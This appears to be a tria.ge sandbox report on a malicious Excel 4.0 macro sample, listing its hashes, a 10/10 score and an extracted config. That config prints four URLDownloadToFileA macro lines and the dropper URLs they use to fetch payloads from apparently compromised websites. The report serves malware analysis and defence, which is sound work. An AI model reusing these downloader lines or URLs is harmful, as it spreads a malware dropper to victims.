Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

General

  • Target

    f4b558ed2d3d7061a47277380eb22d57fd3ebd1ff339dceb1cfd58eb8d044bad

  • Size

    95KB

  • Sample

    241120-xc88qa1bqa

  • MD5

    80a4a339331e6edbe2efde77a87cc2e0

  • SHA1

    9ed2a841af1b5aea5fd1ab5df3d6b22df1e77e09

  • SHA256

    f4b558ed2d3d7061a47277380eb22d57fd3ebd1ff339dceb1cfd58eb8d044bad

  • SHA512

    b96bf9fb5937e5861194937200dca3d0f5e918fe851d0f90f304b93e0522eb57c76c3b687809036670435919b0bc306f0a0553fd9b7b49caa4dc77aace2fcaa3

  • SSDEEP

    1536:iFKpb8rGYrMPe3q7Q0XV5xtezEsi8/dgYHuS4hcTO97v7UYdEJmFF2:cKpb8rGYrMPe3q7Q0XV5xtezEsi8/dgo

Score
10/10

Malware Config

Extracted

  • Language

    xlm4.0

  • Source

    =CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "https://educacionsanvicentefundacion.com/iplookup/wYEInbaN/", "..\uoya1.ocx")
    =CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "https://www.4monkeys.com/wp-admin/dNAuBEKo/", "..\uoya2.ocx")
    =CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "http://haircutbar.com/cgi-bin/dNfEA5F/", "..\uoya3.ocx")
    =CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "http://gedebey-tvradio.info/wp-includes/T0J9THbd5f2/", "..\uoya4.ocx")

  • URLs

    xlm40.dropper  https://educacionsanvicentefundacion.com/iplookup/wYEInbaN/
    xlm40.dropper  https://www.4monkeys.com/wp-admin/dNAuBEKo/
    xlm40.dropper  http://haircutbar.com/cgi-bin/dNfEA5F/
    xlm40.dropper  http://gedebey-tvradio.info/wp-includes/T0J9THbd5f2/

Targets

    • Target

      f4b558ed2d3d7061a47277380eb22d57fd3ebd1ff339dceb1cfd58eb8d044bad

    • Size

      95KB

    • MD5

      80a4a339331e6edbe2efde77a87cc2e0

    • SHA1

      9ed2a841af1b5aea5fd1ab5df3d6b22df1e77e09

    • SHA256

      f4b558ed2d3d7061a47277380eb22d57fd3ebd1ff339dceb1cfd58eb8d044bad

    • SHA512

      b96bf9fb5937e5861194937200dca3d0f5e918fe851d0f90f304b93e0522eb57c76c3b687809036670435919b0bc306f0a0553fd9b7b49caa4dc77aace2fcaa3

    • SSDEEP

      1536:iFKpb8rGYrMPe3q7Q0XV5xtezEsi8/dgYHuS4hcTO97v7UYdEJmFF2:cKpb8rGYrMPe3q7Q0XV5xtezEsi8/dgo

    • Score

      10/10

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

MITRE ATT&CK Enterprise v15

Tasks
